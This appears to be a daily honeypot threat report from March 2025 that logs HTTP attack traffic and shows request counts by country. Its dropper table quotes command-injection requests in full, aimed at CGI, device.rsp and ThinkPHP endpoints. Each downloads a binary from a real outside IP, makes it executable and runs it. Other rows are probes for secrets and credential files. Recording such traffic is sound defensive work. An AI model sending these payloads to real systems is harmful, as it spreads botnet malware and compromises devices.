Daily Report: 2025-03-28#
Interaction report on http service of various honeypot around the world.
ot_simplified_report#
Simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
AU | |
US | Dubai |
CN | Georgia |
CN | Georgia |
US | |
US |
botnet_dropper_behaviour#
List of requests suspected of having stage 1 dropper behavior (programs designed to extract other files from their own code).
remote_addr | request |
---|---|
31.170.22.205 | GET /cgi-bin/live_api.cgi?page=satellite_list&id=&ip=$(cd+/var/tmp;wget+http://31.170.22.205/dl18;curl+-O+http://31.170.22.205/dl18;sh+dl18) HTTP/1.1 |
87.121.84.30 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20sex HTTP/1.1 |
141.98.11.27 | GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+arm4+efefa7;wget+http:/\x5C/176.65.134.201/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\x5C/176.65.134.201/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.1 |
185.191.127.222 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.87.43.37%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1 |
141.98.11.210 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20sex HTTP/1.1 |
27.128.156.189 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
185.233.117.25 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://152.42.234.215/bns/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
78.183.216.35 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘rm -rf bejv86; wget http://176.65.134.201/bejv86 -O /tmp/.Aqua; chmod 777 /tmp/.Aqua; /tmp/.Aqua thinkphp.selfrep’ HTTP/1.1 |
220.170.80.79 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
123.157.136.106 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
45.40.228.160 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
200.81.185.179 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://157.230.218.54/bins/nine.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
request#
List of requests of the day that have never been detected, other requests that have already been detected and archived in the request database..
number_of_occurence | request | |
---|---|---|
245 | 2 | CNXN\x00\x00\x00\x01\x00\x10\x00\x00\x07\x00\x00\x002\x02\x00\x00\xBC\xB1\xA7\xB1host::\x00 |
295 | 1 | GET /Odin/http/call1743127399 HTTP/1.1 |
296 | 1 | GET /OdinHttpCall1743127399 HTTP/1.1 |
297 | 1 | GET /odinhttpcall1743127399 HTTP/1.1 |
306 | 1 | GET /Odin/http/call1743128020 HTTP/1.1 |
307 | 1 | GET /OdinHttpCall1743128020 HTTP/1.1 |
308 | 1 | GET /odinhttpcall1743128020 HTTP/1.1 |
312 | 1 | \x00\x0E8\xBE\xA3\x8A\xD4\xCB(\x0C\xB4\x00\x00\x00\x00\x00 |
313 | 1 | \x00\x0E\x08\xBE\xA3\x8A\xD4\xCB(\x0C\xB4\x00\x00\x00\x00\x00 |
391 | 1 | GET /socket.io/1/?t=1743146321861 HTTP/1.1 |
394 | 1 | GET /socket.io/1/?t=1743146338760 HTTP/1.1 |
395 | 1 | GET /ban.php HTTP/1.1 |
437 | 1 | \xA4\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00\x1A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00\x1B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00\x1D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00\x1E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00\x1F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00!\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x00\x00\x00\x00\x00\x00\x00’\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
443 | 1 | GET /Media/Images/1FCA38A3.JPG HTTP/1.1 |
449 | 1 | GET /JcWX HTTP/1.1 |
453 | 1 | GET /nmaplowercheck1743184646 HTTP/1.1 |
461 | 1 | GET /NmapUpperCheck1743184646 HTTP/1.1 |
503 | 1 | GET /Nmap/folder/check1743184646 HTTP/1.1 |
531 | 1 | GET /odinhttpcall1743146883 HTTP/1.1 |
532 | 1 | GET /OdinHttpCall1743146883 HTTP/1.1 |
533 | 1 | GET /Odin/http/call1743146883 HTTP/1.1 |
556 | 1 | GET /phpinfo/php-details.php HTTP/1.1 |
558 | 1 | GET /phpinformation HTTP/1.1 |
560 | 1 | GET /secret HTTP/1.1 |
561 | 1 | GET /secret.txt HTTP/1.1 |
562 | 1 | GET /secret_keys HTTP/1.1 |
564 | 1 | GET /secrets.hjson HTTP/1.1 |
566 | 1 | GET /secrets.kdbx HTTP/1.1 |
567 | 1 | GET /secrets.pgp HTTP/1.1 |
568 | 1 | GET /secrets.xml HTTP/1.1 |
569 | 1 | GET /secrets.yaml HTTP/1.1 |
570 | 1 | GET /server/phpinfo.php HTTP/1.1 |
572 | 1 | GET /secrets.cson HTTP/1.1 |
581 | 1 | GET /php/phpinfo.php HTTP/1.1 |
583 | 1 | GET /credentials.cfg HTTP/1.1 |
584 | 1 | GET /credentials.hjson HTTP/1.1 |
586 | 1 | GET /credentials.xml HTTP/1.1 |
588 | 1 | GET /info/phpinfo HTTP/1.1 |
589 | 1 | GET /info/phpinfo.php HTTP/1.1 |
590 | 1 | GET /php-info HTTP/1.1 |
591 | 1 | \x00\x0E8\xF1\xF8\xF3S\xA1\x17K\x9E\x00\x00\x00\x00\x00 |
country_iso_code#
List of country names and number of requests received by IPs located in these countries.
number_of_occurence | country_iso_code | |
---|---|---|
0 | 913 | NL |
1 | 324 | US |
2 | 203 | AU |
3 | 190 | CN |
4 | 151 | GB |
5 | 127 | HK |
6 | 125 | BG |
7 | 122 | DE |
8 | 70 | LT |
9 | 67 | RU |
10 | 60 | PL |
11 | 47 | CH |
12 | 46 | FI |
13 | 37 | FR |
14 | 37 | SC |
15 | 36 | SG |
16 | 20 | NG |
17 | 16 | JP |
18 | 16 | CA |
19 | 15 | PT |
20 | 14 | ID |
21 | 14 | TR |
22 | 8 | VN |
23 | 7 | BE |
24 | 7 | UA |
25 | 7 | NO |
26 | 6 | KR |
27 | 6 | IT |
28 | 6 | IN |
29 | 5 | GH |
30 | 5 | BR |
31 | 5 | TW |
32 | 4 | IR |
33 | 3 | IE |
34 | 3 | MC |
35 | 3 | LV |
36 | 2 | AO |
37 | 2 | AE |
38 | 2 | AZ |
39 | 1 | GR |
40 | 1 | BD |
41 | 1 | CY |
42 | 1 | AR |